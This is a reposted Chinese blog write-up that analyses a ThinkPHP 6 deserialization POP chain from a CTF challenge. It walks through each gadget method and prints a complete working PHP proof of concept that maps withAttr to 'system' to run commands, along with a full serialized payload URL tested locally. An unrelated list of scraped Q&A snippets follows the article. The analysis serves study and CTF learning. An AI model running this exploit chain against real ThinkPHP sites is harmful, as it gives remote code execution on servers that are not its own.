黑客手把手教你分析一次漏洞

2020-12-04 16:20:59 佚名

黑客手把手教你分析一次漏洞

前言

去年的安洵杯,裡面有一道iamthinking的題目(好像是這個名字吧),裡面考察到了tp6的反序列化(通過訪問www.zip可以下載源碼),按照慣例,我還是沒有做出來,我不知道咋繞過那個正則emmmm,給沒有做題的大師傅獻上關鍵源碼吧,如果有師傅懂,歡迎評論

<code>";

        $paylaod = @$_GET['payload'];

        if(isset($paylaod))

        {

            $url = parse_url($_SERVER['REQUEST_URI']);

            parse_str($url['query'],$query);

            foreach($query as $value)

            {

                if(preg_match("/^O/i",$value))

                {

                    die('STOP HACKING');

                    exit();

                }

            }

            unserialize($paylaod);

        }

    }

}
/<code>

雖然題沒有做出來,但是tp6的反序列化POP鏈必須學習一波。

PoC獻上

<code> "system"];

    public function get()

    {

        $this->data = ["axin" => "ls"];  //你想要執行的命令,這裡的鍵值只需要保持和withAttr裡的鍵值一致即可

    }

}

namespace think;

abstract class Model{

    use model\concern\Attribute;

    use model\concern\Conversion;

    private $lazySave = false;

    protected $withEvent = false;

    private $exists = true;

    private $force = true;

    protected $field = [];

    protected $schema = [];

    protected $connection='mysql';

    protected $name;

    protected $suffix = '';

    function __construct(){

        $this->get();

        $this->lazySave = true;

        $this->withEvent = false;

        $this->exists = true;

        $this->force = true;

        $this->field = [];

        $this->schema = [];

        $this->connection = 'mysql';

    }

}

namespace think\model;

use think\Model;

class Pivot extends Model
{

    function __construct($obj='')

    {

        parent::__construct();

        $this->name = $obj;

    }

}

$a = new Pivot();

$b = new Pivot($a);

echo urlencode(base64_encode(serialize($b)));
/<code>

大佬們好像沒有放現成的PoC,我這裡自己糊弄了一個,大家將就著看吧,下面我們就來看看整個POP鏈吧。

利用鏈分析

這次的利用鏈後半部分也就是__toString()後面的鏈條都是與tp5.2.x一樣的,只是前半條鏈不一致,奈何我之前只分析過tp5.1.x的,而5.1.x與5.2.x的區別就是後半條鏈不一致,也就是說tp5.1.x的利用鏈與tp6.x的利用鏈完全不一樣,而我在準備復現tp5.2.x的pop鏈時,用composer安裝tp5.2.x死活安不上,但是官網上又說5.2只能用composer安裝.......

黑客手把手教你分析一次漏洞

在這裡插入圖片描述

跑去github上提issue,結果官方回覆說沒有5.2版本了......說出來給各位師傅們避個坑

先列出利用鏈:

<code>think\Model --> __destruct()

think\Model --> save()

think\Model --> updateData()

think\Model --> checkAllowFields()

think\Model --> db()

後半部分利用鏈(同tp 5.2後半部分利用鏈)

think\model\concern\Conversion --> __toString()

think\model\concern\Conversion --> __toJson()

think\model\concern\Conversion --> __toArray()

think\model\concern\Attribute --> getAttr()

think\model\concern\Attribute --> getValue()
/<code>

可以看到我把利用鏈拆分為了兩部分,前面一部分是到有字符串拼接操作為止,後面一部分是從字符串拼接的魔術方法開始,一直到代碼執行的觸發點。接下來我們就一邊梳理利用鏈,一邊構造POC。

Model的__destruct方法

<code>public function __destruct()
{

    echo "lazySave的值:".$this->lazySave."
";

    if ($this->lazySave) {

        $this->save();

    }

}
/<code>

這裡要執行save方法,需要lazySave=true

跟進save方法,因為我們關注的只是updateData方法,所以updateData後面的代碼我就省略掉了:

<code>    public function save(array $data = [], string $sequence = null): bool

    {

        // 數據對象賦值

        $this->setAttrs($data);

        if ($this->isEmpty() || false === $this->trigger('BeforeWrite')) {

            return false;

        }

        $result = $this->exists ? $this->updateData() : $this->insertData($sequence);

  xxxxxxxxxxxx

        return true;

    }
/<code>

為了能夠順利執行到updateData(),我們需要保證前面的if條件判斷不成立($this->isEmpth()==false和$this->trigger()==true)以及$this->exists=true

isEmpty

<code>public function isEmpty(): bool
{

    return empty($this->data);

}
/<code>

只要保證this->data不為空就行

trigger

<code>protected function trigger(string $event): bool
{

    if (!$this->withEvent) {

        return true;

    }

    $call = 'on' . Str::studly($event);

    try {

        if (method_exists(static::class, $call)) {

            $result = call_user_func([static::class, $call], $this);

        } elseif (is_object(self::$event) && method_exists(self::$event, 'trigger')) {

            $result = self::$event->trigger(static::class . '.' . $event, $this);

            $result = empty($result) ? true : end($result);

        } else {

            $result = true;

        }

        return false === $result ? false : true;

    } catch (ModelEventException $e) {

        return false;

    }

}
/<code>

看似這麼長一串,但是我們只需要令withEvent=false就可以直接發揮true,回到save函數,接下來再令$this->exists==true,然後進入updateData()

<code>    protected function updateData(): bool

    {

        echo "updateData執行-----
";

        // 事件回調

        if (false === $this->trigger('BeforeUpdate')) {  // 經過我們之前的設置,這兒直接跳過

            return false;

        }

        $this->checkData();

        // 獲取有更新的數據

        $data = $this->getChangedData();

        if (empty($data)) {

            // 關聯更新

            if (!empty($this->relationWrite)) {

                $this->autoRelationUpdate();

            }

            return true;

        }

        if ($this->autoWriteTimestamp && $this->updateTime && !isset($data[$this->updateTime])) {

            // 自動寫入更新時間

            $data[$this->updateTime]       = $this->autoWriteTimestamp($this->updateTime);

            $this->data[$this->updateTime] = $data[$this->updateTime];

        }

        // 檢查允許字段

        $allowFields = $this->checkAllowFields();

        xxxxxxxxx
/<code>

為了能夠調用到checkAllowFields(),還是需要保證前面不直接return,所以$data不能為空,所以我們跟進getChangedData()

<code>public function getChangedData(): array
{

    $data = $this->force ? $this->data : array_udiff_assoc($this->data, $this->origin, function ($a, $b) {

        if ((empty($a) || empty($b)) && $a !== $b) {

            return 1;

        }

        return is_object($a) || $a != $b ? 1 : 0;

    });

    // 只讀字段不允許更新

    foreach ($this->readonly as $key => $field) {

        if (isset($data[$field])) {

            unset($data[$field]);

        }

    }

    return $data;

}
/<code>

第二個foreach不需要在意,我們這裡令$this->force==true直接返回我們之前自定義的非空data,回到updateData(),後面會執行到if判斷,但是不影響我們的流程,忽略,這就進入了checkAllowFields()

<code>protected function checkAllowFields(): array
{

    echo "進入checkAllowFields()函數
";

    // 檢測字段

    if (empty($this->field)) {

        if (!empty($this->schema)) {

            $this->field = array_keys(array_merge($this->schema, $this->jsonType));

        } else {

            $query = $this->db();

            $table = $this->table ? $this->table . $this->suffix : $query->getTable();

            $this->field = $query->getConnection()->getTableFields($table);

        }

        return $this->field;

    }

   

    xxxxxxx

}
/<code>

為了執行db(),令$this->schema與$this->field為空,進入db()

<code>public function db($scope = []): Query

    {

        echo "進入db()函數
";

        /** @var Query $query */

        echo "db函數中的變量值如下:
";

        echo "connection=".$this->connection."
";

        echo "name=";var_dump($this->name);echo "
";

        echo "suffix=".$this->suffix." 

";

        $query = self::$db->connect($this->connection)

            ->name($this->name . $this->suffix)

            ->pk($this->pk);

    }
/<code>

在db函數里執行了$this->name.$this->suffix這種字符串拼接操作,但是在這之前需要滿足$db->connect()也就是令$this->connection=='mysql',至此前半條鏈已經完成。我們知道了每個變量的值怎麼設置,我們還得找一個合適的類,因為Model類是抽象類,不能實例化,我們找一個他的子類,和tp5.1一樣我們還是用Pivot類來構造PoC,不難構造出如下半成品:

<code>namespace think;

abstract class Model{

    use model\concern\Attribute;

    use model\concern\Conversion;

    private $lazySave = false;

    protected $withEvent = false;

    private $exists = true;

    private $force = true;

    protected $field = [];

    protected $schema = [];

    protected $connection='mysql';

    protected $name;

    protected $suffix = '';

    function __construct(){

        $this->get();

        $this->lazySave = true;

        $this->withEvent = false;

        $this->exists = true;

        $this->force = true;

        $this->field = [];

        $this->schema = [];

        $this->connection = 'mysql';

    }

}

namespace think\model;

use think\Model;

class Pivot extends Model
{

    

}
/<code>

因為前半條鏈已經來到了$this->name.$this->suffix,那麼無論是name還是suffix連接後半條鏈都是可以的,重要的就是這後半條鏈從那個類開始,漏洞作者找到Conversion類,其中他的魔術方法__toString如下:

<code>public function __toString()
{

    return $this->toJson();

}
/<code>

繼續跟toJson:

<code>public function toJson(int $options = JSON_UNESCAPED_UNICODE): string
{

     return json_encode($this->toArray(), $options);

}
/<code>

跟進toArray:

<code>    public function toArray(): array

    {

        echo "進入toArray函數!!!
";

        $item       = [];

        $hasVisible = false;

        foreach ($this->visible as $key => $val) {

            xxxxxx

        }

        foreach ($this->hidden as $key => $val) {

            xxxxxx

        }

        // 合併關聯數據

        $data = array_merge($this->data, $this->relation); //$data=["axin"=>"ls"]

        foreach ($data as $key => $val) {

            if ($val instanceof Model || $val instanceof ModelCollection) {

                // 關聯模型對象

                if (isset($this->visible[$key]) && is_array($this->visible[$key])) {

                    $val->visible($this->visible[$key]);

                } elseif (isset($this->hidden[$key]) && is_array($this->hidden[$key])) {

                    $val->hidden($this->hidden[$key]);

                }

                // 關聯模型對象

                if (!isset($this->hidden[$key]) || true !== $this->hidden[$key]) {

                    $item[$key] = $val->toArray();

                }

            } elseif (isset($this->visible[$key])) {

                $item[$key] = $this->getAttr($key);

            } elseif (!isset($this->hidden[$key]) && !$hasVisible) {

                $item[$key] = $this->getAttr($key);

            }

        }

       xxxxxx

        return $item;

    }
/<code>

根據我最開始給出的poc,$data=["axin"=>"ls"],所以會來到最後一個getAttr()函數處,我們跟進

<code>public function getAttr(string $name)
{

    echo "進入getAttr函數!!!!
";

    try {

        $relation = false;

        $value    = $this->getData($name); // $name='axin'

    } catch (InvalidArgumentException $e) {

        $relation = $this->isRelationAttr($name);

        $value    = null;

    }

    return $this->getValue($name, $value, $relation);

}
/<code>

如果熟悉tp5.1.x pop鏈的同學肯定覺得getData的似曾相識,我們一起來看看吧: 

<code>public function getData(string $name = null)//$name='axin'
{

    echo "進入getData函數!!!!
";

    if (is_null($name)) {

        return $this->data;

    }

    $fieldName = $this->getRealFieldName($name);

    if (array_key_exists($fieldName, $this->data)) {

        return $this->data[$fieldName];

    } elseif (array_key_exists($fieldName, $this->relation)) {

        return $this->relation[$fieldName];

    }

    throw new InvalidArgumentException('property not exists:' . static::class . '->' . $name);

}
/<code>

跟進getRealFieldName:

<code>protected function getRealFieldName(string $name): string  // $name = 'axin'
{

    return $this->strict ? $name : Str::snake($name);

}
/<code>

這裡我們可以令$this->strict=true,這樣就會發揮‘axin’,回到getData,getData繼續執行,也就是$fieldName='axin',最後getData()返回$this->data['axin']也就是返回了'ls'。回到getAttr(),繼續執行進入getValue():

<code>protected function getValue(string $name, $value, $relation = false)
{

    echo "進入getValue函數!!!!
";

    // 檢測屬性獲取器

    $fieldName = $this->getRealFieldName($name); //$fieldName='axin'

    $method    = 'get' . Str::studly($name) . 'Attr';

    if (isset($this->withAttr[$fieldName])) {

        if ($relation) {

            $value = $this->getRelationValue($relation);

        }

        if (in_array($fieldName, $this->json) && is_array($this->withAttr[$fieldName])) {

            $value = $this->getJsonValue($fieldName, $value);

        } else {

            echo "到達代碼執行觸發點!!!
";

            $closure = $this->withAttr[$fieldName];  //這裡的withAttr = ["axin"=>"system"]

            $value   = $closure($value, $this->data);

        }

    } elseif (method_exists($this, $method)) {

        xxxxxx

    } elseif (isset($this->type[$fieldName])) {

        xxxxx

    } elseif ($this->autoWriteTimestamp && in_array($fieldName, [$this->createTime, $this->updateTime])) {

      xxxx

    } elseif ($relation) {

       xxxxxxxxxx

    }

    return $value;

}
/<code>

這裡順序執行,默認會執行到

<code>$closure = $this->withAttr[$fieldName];  //這裡的withAttr = ["axin"=>"system"] ,$filedName='axin'

$value   = $closure($value, $this->data);//最終執行system("ls", ["axin"=>"ls"])
/<code>

可以看到最終是執行了system("ls", ["axin"=>"ls"]),而system函數第二個參數是可選的,也就是這種用法是合法的

注:

system ( string $command [, int &$return_var ] ) : string

參數

command

要執行的命令。

return_var

如果提供 return_var 參數, 則外部命令執行後的返回狀態將會被設置到此變量中。

至此,Tp5.6.x的pop鏈後半段也結束了。剩下的就是完善剛剛前半段POP鏈構造的poc了,成品也就是我最開始貼出來的那個,最後看一下我本地調試的效果,當然在調試過程中需要自己構造一個反序列化點,我直接在Index控制器中構造了一個新方法反序列化$_GET[p]:

黑客手把手教你分析一次漏洞

然後請求/public/index.php/index/unser?p=TzoxNzoidGhpbmtcbW9kZWxcUGl2b3QiOjExOntzOjIxOiIAdGhpbmtcTW9kZWwAbGF6eVNhdmUiO2I6MTtzOjEyOiIAKgB3aXRoRXZlbnQiO2I6MDtzOjE5OiIAdGhpbmtcTW9kZWwAZXhpc3RzIjtiOjE7czoxODoiAHRoaW5rXE1vZGVsAGZvcmNlIjtiOjE7czo4OiIAKgBmaWVsZCI7YTowOnt9czo5OiIAKgBzY2hlbWEiO2E6MDp7fXM6MTM6IgAqAGNvbm5lY3Rpb24iO3M6NToibXlzcWwiO3M6NzoiACoAbmFtZSI7TzoxNzoidGhpbmtcbW9kZWxcUGl2b3QiOjExOntzOjIxOiIAdGhpbmtcTW9kZWwAbGF6eVNhdmUiO2I6MTtzOjEyOiIAKgB3aXRoRXZlbnQiO2I6MDtzOjE5OiIAdGhpbmtcTW9kZWwAZXhpc3RzIjtiOjE7czoxODoiAHRoaW5rXE1vZGVsAGZvcmNlIjtiOjE7czo4OiIAKgBmaWVsZCI7YTowOnt9czo5OiIAKgBzY2hlbWEiO2E6MDp7fXM6MTM6IgAqAGNvbm5lY3Rpb24iO3M6NToibXlzcWwiO3M6NzoiACoAbmFtZSI7czowOiIiO3M6OToiACoAc3VmZml4IjtzOjA6IiI7czoxNzoiAHRoaW5rXE1vZGVsAGRhdGEiO2E6MTp7czo0OiJheGluIjtzOjI6ImxzIjt9czoyMToiAHRoaW5rXE1vZGVsAHdpdGhBdHRyIjthOjE6e3M6NDoiYXhpbiI7czo2OiJzeXN0ZW0iO319czo5OiIAKgBzdWZmaXgiO3M6MDoiIjtzOjE3OiIAdGhpbmtcTW9kZWwAZGF0YSI7YToxOntzOjQ6ImF4aW4iO3M6MjoibHMiO31zOjIxOiIAdGhpbmtcTW9kZWwAd2l0aEF0dHIiO2E6MTp7czo0OiJheGluIjtzOjY6InN5c3RlbSI7fX0%3D,可以看到成功執行ls命令,其他那些亂七八糟的輸出是我調試是自己echo的,大家在編寫反序列化poc時也可以這樣一點點確定自己寫對了沒。

黑客手把手教你分析一次漏洞

在這裡插入圖片描述

參考

向大佬們看齊,respect

https://xz.aliyun.com/t/6619

https://xz.aliyun.com/t/6479

https://www.anquanke.com/post/id/187393

https://www.anquanke.com/post/id/187332


黑客手把手教你分析一次漏洞

分享到:

關鍵字: function 做題 源碼

相關文章:

“手把手”教你直播帶貨!臺青主播培訓課程在中國臺灣網開講

學會這幾招,手把手教你養出殼小雞苗,養雞沒問題

淘寶軟件搶茅臺(手把手教你)

秒懂輪胎如何換位

麗人時尚女人

00後小夥,用空餘時間,免費教大家月入6000副業方法。

怎麼把產品圖提高質感?ps製作高級磨砂背景方法,手把手教會你

比買來更好喝的青梅酒,看完這篇你也能擁有

學平面設計就業

裕華區建南社區推進“健康碼”方便居民通行

阜陽大黃鎮:紮實做好“陽光村務”建設

君山:稅務輔導手把手 紓困解難心貼心

面對面,手把手,創文資料申報更準確更高效

2020年個稅抵扣需重新採集 ,不填影響收入,手把手教你填報

愛月寶月嫂培訓,打造金牌月嫂助力千萬孕媽

肖戰演技差?汪海林暗諷:演戲需要手把手教,是對職業演員的侮辱

督導員街頭上“分類課堂”手把手教群眾垃圾分類

重慶邦樂家電清洗服務公司清洗師 “手把手”教你清洗洗衣機!

風景插畫怎麼畫?這套教程手把手教你,全程乾貨

手把手,教你玩轉可轉債!(11):買賣可轉債的必勝法則!

關乎你的錢袋子!個人所得稅多退少補指南,手把手教你

這次疫情,很多事可以線上幹,我這活線上咋幹嘛

這些實體商家成功的背後,到底有什麼祕密?

手把手教您買茶不入坑的訣竅

襄陽保康:消防宣傳進藥店 為其送安全“良方”

消防員主動上門服務企業,手把手“陪練”切實加強消防安全管理

手把手,教你玩轉可轉債!(10):如何構建可轉債組合?

職場不適用的“學生思維”,看你中了幾條

家庭版電飯煲蛋糕到底怎麼做,快來看看,手把手教你!

手把手教你打造時尚創意眼妝,驚豔你的眼球~

實不相瞞,我的“睡後收入”是我工資3倍:躺賺的人生,真的太爽了

【618爆搜索玩法】手把手教你新品如何14天快速起爆15000個訪客

手把手教你快速剝小龍蝦技巧,三秒一隻,方法簡單又省事

哈囉凱蒂告訴你開奶茶店一個創業的好項目

如何在抖音上傳超長視頻,手把手教你

夢之穎我的夢

手把手教學!2步驟刷出昆凌同款洋娃娃睫毛,加碼睫毛膏染急救帖

原創配方丨手把手教你做網紅曲奇餅乾,超級酥脆!

天熱了,40年老瓜農手把手教你挑西瓜,記住4個訣竅,一挑一個準

怎樣為你的 Vue.js 單頁應用提速

完結純愛:甜校園,雙學神手把手教考第一《穿成校草的炮灰情敵》

儋州:中國熱科院專家手把手傳技 橡膠樹死皮也能救活了

怎樣成為五一節最亮眼的妞?演員張予曦手把手教你 “口罩妝”!

“手把手”做好源頭分類 城關區積極推廣垃圾分類好經驗好機制好做法

澧縣官垸鎮:技術專家進田間 為貧困戶脫貧致富保駕護航

「手把手系列1」購物也能用著天眼查App?

石朝鄉:花椒管護正當時

月入百萬的祕密是?7天速成,快來報名!財經短視頻正處於風口,想開始卻不知道怎麼做嗎?萬粉財經短視頻創作者,收入都能超過百萬,特羨慕?加入西瓜財經造星營,從零開始手把手教你如何拍攝財經短視頻,打造屬於自己的短視頻IP!不論你是金融行業從業者、財經媒體從業者,還是財經領域愛好者,只要你從來沒有在

財經視頻MCN招募計劃來了!10億流量,打造10個價值千萬的財經MCN,先到先得!西瓜財經聯合頭條財經、海豚股票一起搞事情!平臺將從運營、流量、變現等各維度全面支持,從零開始手把手打造!不管你是金融從業機構、財經MCN機構還是財經教培機構,只要願意你就來~機構要求:雙月孵化優質賬號數量≥5

抽獎了!1月23日下午2點股票君將邀請投資達人@玉名 做客《大咖說市》欄目解答大家的投資問題,這次的獎品就是玉名老師撰寫的“手把手教你解套系列”共三本書籍,關注@頭條股票 並轉發這條內容,我們將在明晚23點準時抽出5位粉絲送出此套書籍,趕緊進入#對話玉名#向大咖提問吧!

剛剛工作的畢業生,一個月只有2000多,是不是太少了?

剛剛工作的畢業生,一個月只有2000多,是不是太少了?

剛剛:剛剛工作的畢業生,一個月只有2000多,是不是太少了? 根據你城市消費水平來看啊,還有你從事的工作,假如你在二三線城市做一份事業單位或者是編制類的工作,薪資水平是隨著你工作年限逐年增長的,而且在年終也有很多福利補貼待遇等等,算下來收入也是可觀的,再舉一個例:-畢業生 2000

為什麼只有edg賺錢?

為什麼只有edg賺錢?

電競行業作為一個新興產業,這幾年發展勢頭越來越好,IG戰隊,FPX戰隊先後奪得了s8-s9世界賽的冠軍,據俱樂部知情人士透露,除了國內的幾家豪門俱樂部之外,其他俱樂部基本都是虧錢在做的,當然EDG也是:-edg 賺錢:為什麼只有edg賺錢?

網上羅馬仕充電寶20000毫安的,參數怎麼很多樣?哪個是真的?

網上羅馬仕充電寶20000毫安的,參數怎麼很多樣?哪個是真的?

20000:網上羅馬仕充電寶20000毫安的,參數怎麼很多樣?哪個是真的? 天貓旗艦店,或者淘寶旗艦店,或者京東旗艦店肯定包真,質量好,再說可以官方驗證啊,不能圖那十塊五塊的便宜,畢竟一個充電寶要用好久呢,一兩年沒問題的。:-羅馬仕 馬仕 毫安

我們買的新商品房還沒有拿到房產證,怎麼轉賣最好?

我們買的新商品房還沒有拿到房產證,怎麼轉賣最好?

沒有取得房抄產證的房子可以轉讓。但如果確定無法取得房產證的,房產轉讓不受法律保襲護。一般情況下,只有取得房產證的房屋才能確定房屋產權人,才具有轉讓的條件。但如果房屋是合法取得的,以百後可以依法辦理度房:-轉賣 房產證 商品房 拿到:我們買的新商品房還沒有拿到房產證,怎麼轉賣最好?

為什麼突厥人可以成功復國?是大唐的刀不鋒利了麼?

為什麼突厥人可以成功復國?是大唐的刀不鋒利了麼?

鋒利 突厥人 你這樣說只能說明你對歷史非常不瞭解,我先用一句話概括突厥被大唐雄兵打的有多慘:三次滅國,背井離鄉,遠赴西亞,打不過,俺躲著你還不行嗎?突厥的意思是中間慫起的頭盔。其來歷已經不可靠,可能有著匈奴、鮮卑或:-復國 大唐:為什麼突厥人可以成功復國?是大唐的刀不鋒利了麼?

小高層16層高樓間距60米哪一層比較好?

小高層16層高樓間距60米哪一層比較好?

小高層 60:小高層16層高樓間距60米哪一層比較好? 首先需要明白,選擇層數居住與樓間距毫無關係,住在哪一層,肉眼看對面樓的距離,是相差不大的。設定樓間距60米,純粹是混淆視聽。其實,一幢樓的樓層總數確定的情況下,到底哪一層最佳?很簡單,取總層數乘以黃金:-樓間距 層高

金銀花盆栽好養嗎?怎麼養?

金銀花盆栽好養嗎?怎麼養?

金銀花可以盆栽,很好養的!金銀花,是忍冬科的常綠纏繞灌木,枝條柔韌修長,多攀爬或匍匐生長。金銀花生性強健,在我國的很多南方省份野外很多地區都能看到它的身影,葉子常年翠綠,到夏季開花,飄香四溢。所以,有:-金銀花 盆栽:金銀花盆栽好養嗎?怎麼養?

長城對於抵禦古代匈奴和蒙古人起到了多大作用?

長城對於抵禦古代匈奴和蒙古人起到了多大作用?

長城真的無用嗎?在今天許多人認為長城無用,古代國家舉國之力建造的長城不過只是文物,就連康熙都曾作詩諷刺,原文如下:萬里經營到海涯,紛紛調發逐浮誇。當時用盡生民力,天下何曾屬爾家。-康熙但真的如此嗎?小:-匈奴 抵禦 長城:長城對於抵禦古代匈奴和蒙古人起到了多大作用? 蒙古人

什麼樹可以嫁接臘梅?

什麼樹可以嫁接臘梅?

臘梅只能嫁接在不同品種的臘梅上,其他的樹種不行!臘梅的繁殖可以用播種,壓條,嫁接,分株等繁殖方法。播種法因不易保持花卉的原有優良特性,且播種的優點是在於大量繁殖,而臘梅大都只需培植少量幾株,故一般都不:-臘梅 嫁接:什麼樹可以嫁接臘梅?

行情堪憂,還有多少教育機構的老師們五一假期有課上的?課時量多不多?

行情堪憂,還有多少教育機構的老師們五一假期有課上的?課時量多不多?

堪憂 五一 假期:行情堪憂,還有多少教育機構的老師們五一假期有課上的?課時量多不多? 事實上,因為教育培訓都是預收費用的模式。但凡有一點點規模的培訓機構老師。在上半年,帶課量是可以得到保證。:-課時量

在農村“立夏節”都有哪些民間習俗?

在農村“立夏節”都有哪些民間習俗?

民間習俗 農村:在農村“立夏節”都有哪些民間習俗? 在農村“立夏節”都有哪些民間習俗一、農村立夏常見的習俗風俗活動:1、吃雞蛋“立夏吃蛋”習俗由來已久,俗話說“立夏吃了蛋,夏天不疰夏”。據說立夏開始天氣越來越熱,村裡小孩兒會有身體疲勞四肢無力的感覺,吃:-立夏節

男朋友失望分手,但對我還有感覺,答應我兩個月之後可以在一起,我應該怎麼做,才能改變之前他對我的看法?

失望 分手 看法:男朋友失望分手,但對我還有感覺,答應我兩個月之後可以在一起,我應該怎麼做,才能改變之前他對我的看法? 你的這個問題特別的有趣,我覺得你先不要看你要怎麼做才讓他才能讓他對你的印象有所改變,你要去看為什麼是兩個月之後可以在一起,這兩個月他會用來做什麼,為什麼會有這兩個月?例如他的身體碰到了什麼樣的問題嗎?:-答應我

工程分包乙方人員傷殘誰承擔?

承擔:工程分包乙方人員傷殘誰承擔? 分包 乙方分包致人傷殘責任誰承擔?嚴格來說,需要了解更多傷殘原因才能區分的,作為非專業人士,自己發表一點淺見供題主參考:1、如果甲方是央企的話,他們合同中的責任、義務等條款內已經將自己的責任全部撇開了,更會:-乙方 傷殘

有哪些看起來毫不相關的兩個歷史人物實際上有過聯繫?

有哪些看起來毫不相關的兩個歷史人物實際上有過聯繫?

實際上:有哪些看起來毫不相關的兩個歷史人物實際上有過聯繫? 歷史人物 聯繫這個詞貌似太寬泛了,就好像有一個調皮的答案說的,胡亥和溥儀相隔2000多年,牽強的找,也有聯繫:都是亡國之君不是。我想題主的意思是兩個看起來應該風馬牛不相及的人物,在歷史上居然是熟悉或是一個時代的:-毫不相關

13年雪鐵龍世嘉自動擋7萬多公里,沒有水泡事故,多少錢能買?

法系車不保值,如果準備常開可以入手,性價比高,價格應該在二至三萬之間,二手車一車一況,一況一價,居體價格看車況。:-錢能 水泡:13年雪鐵龍世嘉自動擋7萬多公里,沒有水泡事故,多少錢能買? 世嘉 自動擋

22+吃土少女17年就有駕駛證了,今年才開始開車,想買個二手昂克賽拉,或者有什麼好建議嗎?

22+吃土少女17年就有駕駛證了,今年才開始開車,想買個二手昂克賽拉,或者有什麼好建議嗎?

17年 駕駛證 二手:22+吃土少女17年就有駕駛證了,今年才開始開車,想買個二手昂克賽拉,或者有什麼好建議嗎? 建議買日系二手車,開順了賣了,買新車,昂克賽拉無法再次出手時獲得好價格,而且也不省油,開完日系車直接換德系:-昂克賽拉

如何騎車去臺灣騎行?

如何騎車去臺灣騎行?

騎車 在臺灣沒有迴歸內地前,最好不要去臺灣,一是國內政策不允許你去臺灣,因為已停止了臺灣個人遊。二是你偷著去臺灣旅遊,安全沒有保障,偷渡客在哪裡也沒有安全保障的。以後內地政策允許個人去臺灣旅遊了,建議那時再:-騎行 臺灣:如何騎車去臺灣騎行?

本人預算5萬左右,想買一輛二手法系車!求推薦?

本人預算5萬左右,想買一輛二手法系車!求推薦?

預算:本人預算5萬左右,想買一輛二手法系車!求推薦? 5萬 預算5萬元左右,想買一輛二手法系車?推薦東風標緻老款308車型。1 5萬元可以買標緻308車況好的,沒大事故呢,年限15年左右,公里數3萬左右,手動檔車型。2 標緻308車型,底盤調教紮實,跑高速穩定:-法系 二手

14年進口馬自達5PK進口10年道奇酷威買哪個划算?

14年進口馬自達5PK進口10年道奇酷威買哪個划算?

道奇 你好,好高興回答你的問題!14年進口馬自達5和10年月道奇酷威個人感覺馬自達5比較划算。新車價馬5報價29.99萬,酷威19.38萬兩款車都是原裝進口,馬5屬於日系,酷威屬於美系。兩款車不屬於同類車型:-酷威 馬自達 14年:14年進口馬自達5PK進口10年道奇酷威買哪個划算?

2020年,河南教育行業國務院特殊津貼推薦,河南大學並列第三,大家怎麼看?

2020年,河南教育行業國務院特殊津貼推薦,河南大學並列第三,大家怎麼看?

特殊津貼 高校人才就要重視,河南省高校人才更要重視,這個人才不是評出了的,而是推薦出來的,沒有推薦,連參評的資格都沒有。國務院特殊津貼人員推薦,不推薦是百分百沒希望,推薦了希望就非常,那麼是什麼是國務院特殊津貼:-河南大學 並列 2020年:2020年,河南教育行業國務院特殊津貼推薦,河南大學並列第三,大家怎麼看?

本田CRV2019款1.5T舒適版油耗高嗎?

本田CRV2019款1.5T舒適版油耗高嗎?

李老貓說車為你非專業解答各種選車用車問題本田crv定位於一款緊湊級suv產品,主要對飈豐田榮放,日產奇駿,這款車整體市場表現非常突出,2019年全年累計銷量為18.44萬臺,平均月銷1.5萬以上,其深:-舒適版 本田 油耗:本田CRV2019款1.5T舒適版油耗高嗎?

國外疫情如果沒有得到有效控制,世界會發生什麼事情?頭腦風暴?

1.世界經濟遭到重創疫情影響之下,各行各業基本屬於停工停產的狀態,在世界經濟趨於一體化的今天,停工停產勢必會造成一系列的連鎖反應,最後導致的結果可能會引發金融危機。2.世界格局可能發生改變美國仍是世界:-頭腦風暴 控制:國外疫情如果沒有得到有效控制,世界會發生什麼事情?頭腦風暴? 疫情 國外

本田XRV這款車的整體表現怎麼樣?我想買1.5T自動豪華版,全款多少錢?

本田XRV這款車的整體表現怎麼樣?我想買1.5T自動豪華版,全款多少錢?

如果有15萬元的預算,讓你選擇一臺空間和動力都很不錯的小型SUV,我覺得很多的讀者都會想到本田XRV這款車型。因為本田XRV確實太出色了,和同級別的其他盒子SUV車型相比,這款車在空間和動力上都有優勢:-xrv 自動:本田XRV這款車的整體表現怎麼樣?我想買1.5T自動豪華版,全款多少錢? 本田 豪華版

現在存款有14萬,借了5萬還沒收回來,該做什麼好?

現在存款有14萬,借了5萬還沒收回來,該做什麼好?

何去何從:現在存款有14萬,借了5萬還沒收回來,該做什麼好? 續租 存款利息率較低,可以投資較高收益的項目,比如投資基金,一般情況下可獲得6%一10%的回報。如果行情好可達到50%以上收益,去年不少基金超過這目標。目前受疫情影響,股市在低位震盪,也是基金投資的機會。一:-存款 2300

2070super和5700xt買哪個比較好?

2070super和5700xt買哪個比較好?

如果是玩遊戲毫無疑問選擇n卡,也就是2070 suep。如果追求性價比可以選擇a卡,也就是5700xt. 為什麼遊戲選n卡呢?首先遊戲廠商針對n卡優化比較多,然後就是功耗小,然後N卡架構執行效率極高,:-:2070super和5700xt買哪個比較好?

生完二胎後,感覺自己有點抑鬱,總是想發火,特別煩躁,怎麼辦?

二胎 我是兩個孩子的媽媽,曾經的我和你一樣,生完寶寶我也抑鬱了,我知道抑鬱症真的很痛苦,產後的那段日子我整天都不開心,做什麼事也沒積極性,誰也不想搭理,別人給我說話我就覺得很煩。忍不住衝家人發脾氣。每當一個:-生完 抑鬱:生完二胎後,感覺自己有點抑鬱,總是想發火,特別煩躁,怎麼辦? 發火

人這一生遇到的人和事為什麼感覺都像是必然的經歷?

人這一生遇到的人和事為什麼感覺都像是必然的經歷?

感覺:人這一生遇到的人和事為什麼感覺都像是必然的經歷? 正所謂有因必有果,所以你今天的因,就會產生明天的果。所以這一切你就會覺得是必然的。生活中大部分是普通人大家的生活規律,生活方式,大致相同。當你看到別人家庭的果,自己家也產生同樣的果,你就會覺得這一切是:-人和 經歷

現在校內校外到底教的是美式英語還是英式英語還是混搭英語?

現在校內校外到底教的是美式英語還是英式英語還是混搭英語?

校內:現在校內校外到底教的是美式英語還是英式英語還是混搭英語? 校外 英式 答案肯定是不唯一的!美式英語現在是主流,少量英式發音也個別存在!但對於孩子來說,肯定是混搭英語,因為孩子肯定不是一直一位老師教下去,肯定會換老師!而老師的發音肯定是既有英式的,也有美式的!就連一些英語:-美式英語

上有老下有小,我們真的跳不出這個人生循環了嗎?

上有老下有小,我們真的跳不出這個人生循環了嗎?

